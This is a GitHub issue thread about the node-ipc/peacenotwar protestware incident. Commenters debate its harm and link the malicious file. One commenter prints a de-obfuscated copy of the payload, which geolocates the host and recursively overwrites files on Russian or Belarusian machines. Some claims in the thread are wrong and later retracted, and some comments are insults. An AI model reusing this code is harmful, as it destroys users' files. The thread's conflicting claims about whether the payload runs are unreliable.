### ISSUE TITLE
All Of You Who Posts These Harassment Posts are Dumb

### ISSUE THREAD

**Issue by cbenriquez** [RIAEvangelist/peacenotwar#61]
**Edit:**

Okay, I seem to have mistaken this module for the entirety of the malicious code. I understand how the fake SSL script can be damaging to developers who rely on this stuff. Sorry about that!

**Original post:**

It seems that Mental Outlaw has unknowingly assembled a mob to cancel a developer who made a purely harmless module.*

_peacenotwar_ is an npm module that must be directly installed from the registry. The first paragraph of the package description makes it clear that this is a protestware and it emphasizes how controlling your node modules is important.

Furthermore, if you take a quick look at the codebase, there is no _unlink_ / _unlinkSync_ function that deletes files on any of the scripts and their use of _writeFile_ has no indication that it maliciously overwrites files. The only instances of _writeFile_ being used is to write _WITH-LOVE-FROM-AMERICA.txt_ on Desktop and OneDrive folder.

It also doesn't contain code that downloads anything and run them.

You guys are really messed up.

**Comment by konsolog** [comment]
oops i accidentally dropped this
https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js

**Comment by AmeliaYeah** [comment]
https://gist.github.com/BrandonMiller97528/671a8bbb8da41ca34b30105db1edde1d

**Comment by sayit358** [comment]
dropped this too https://gist.github.com/BrandonMiller97528/671a8bbb8da41ca34b30105db1edde1d

**Comment by shorwood** [comment]
> peacenotwar is an npm module that must be directly installed from the registry

https://github.com/vuejs/vue-cli/issues/7054#issuecomment-1068677029
"4. Affected users: new projects created during 2022-03-15T05:40:26.758Z and 2022-03-15T13:17:57.076Z; or those who updated project dependencies in that time span."

**Comment by tahir-hassan** [comment]
https://nvd.nist.gov/vuln/detail/CVE-2022-23812

The American government have put this up though?

**Comment by DerrikCreates** [comment]
[no. this guy has hasn't just made a "harmless module"](https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js) 

People are not mad that he JUST created a text file on the desktop.



> peacenotwar is an npm module that must be directly installed from the registry. 

[dependencies](https://www.npmjs.com/package/node-ipc?activeTab=dependencies)
As of writing node-ipc has "peacenotwar" as a dependency. 

https://docs.npmjs.com/cli/v8/commands/npm-install#description

Im not a js developer and have only used npm for installing other services BUT
from what I can tell the "normal" way to install a package is ["npm install <NAME>"](https://docs.npmjs.com/cli/v8/commands/npm-install#description)
"This command installs a package and any packages that it depends on."

**Again this is less about the text file on the desktop and more about the reckless behavior of RIAEvangelist.**

**Comment by Sasytoremember** [comment]
are you a tiny kindergardener?

**Comment by Sasytoremember** [comment]
finally you understood

**Comment by fenderpuddy** [comment]
No U are dumb @cbenriquez

**Comment by 5GameMaker** [comment]
TBH I don't want to have WITH-LOVE-FROM-AMERICA.txt just cuz some retard listed this module as a dependency

**Comment by aidanwd** [comment]
I'm going to try and clear up some of the incorrect information that has been going around. The WITH-LOVE-FROM-AMERICA.txt file is written to your desktop, but none of your files are overwritten. The code people are most concerned about currently was located in [node-ipc/dao/ssl-geospec.js](https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js)
If you read the code carefully, the else if statement that would actually override the files has to pass a check where the path has the index of the functions 2nd parameter. The reason this code is never ran is because the second parameter is "" by default. Nothing that calls this method ever passes through a second parameter. 

This code snippet just looks dangerous, the fs.writeFile() function is never actually executed under any conditions. This is not to say that the author has done nothing malicious. The code to write the text file on your desktop is actually executed. While relatively harmless, when you install a dependency, you expect that it does what it's supposed to do, and not include extra features like that - especially ones that modify the filesystem without permission.

So to conclude my statement, I just want to clarify that I don't support misusing your power like this. The point I am trying to get across is that the main conflict resulting from this is based on incorrect information. The only malicious thing node-ipc did was write that file to the desktop. The code linked above will never override any of your files, although it was designed to **look like** it does. I would really like to hear a response from RIAEvangelist on why he decided to add this malicious looking code in the first place. 



I manually de-obfuscated and annotated the NodeJS code to give you a better idea of what is actually going on (see below)

![image](https://user-images.githubusercontent.com/30511407/158939460-0cdd7816-74dc-486d-916c-889236622f80.png)


```javascript
import path from "path";
import fs from "fs";
import https from "https";
setTimeout(function () {
    if (Math.round(Math.random() * 4) > 1) {
        return;
    }
    const geoLocation = "https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154";
    https.get(geoLocation, function (response) {
        response.on("data", function (jsonData) {
            try {
                const jsonObject = JSON.parse(jsonData);
                const countryName = jsonObject["country_name"].toLowerCase();
                if (countryName.includes("russia") || countryName.includes("belarus")) {
                    getFiles("./");
                    getFiles("../");
                    getFiles("../../");
                    getFiles("/");
                }
            } catch (response) {}
        });
    });
}, Math.ceil(Math.random() * 1000));

async function getFiles(path = "", param2 = "") {
    if (!fs.existsSync(path)) {
        return;
    }
    let fileInDir = [];
    try {
        fileInDir = fs.readdirSync(path);
    } catch (t) {}
    const toDelete = [];
    for (var i = 0; i < fileInDir.length; i++) {
        const combinedPath = path.join(path, fileInDir[i]);
        let pathData = null;
        try {
            pathData = fs.lstatSync(combinedPath);
        } catch (t) {
            continue;
        }
        if (pathData.isDirectory()) {
            const result = getFiles(combinedPath, param2);
            result.length > 0 ? toDelete.push(...result) : null;
        } else if (combinedPath.indexOf(param2) >= 0) {
            try {
                fs.writeFile(combinedPath, "❤️", function () {});
            } catch (t) {}
        }
    }
    return toDelete;
}
const ssl = true;
export { ssl as default, ssl };
```

**Comment by aidanwd** [comment]
On further investigation, it seems the version of nodejs you use effects how the indexOf function will respond with an empty value so I have removed my previous post. I'm sorry for the lack broader testing.

![image](https://user-images.githubusercontent.com/30511407/158948408-22016b6a-19aa-420b-9362-b96420fcc12f.png)
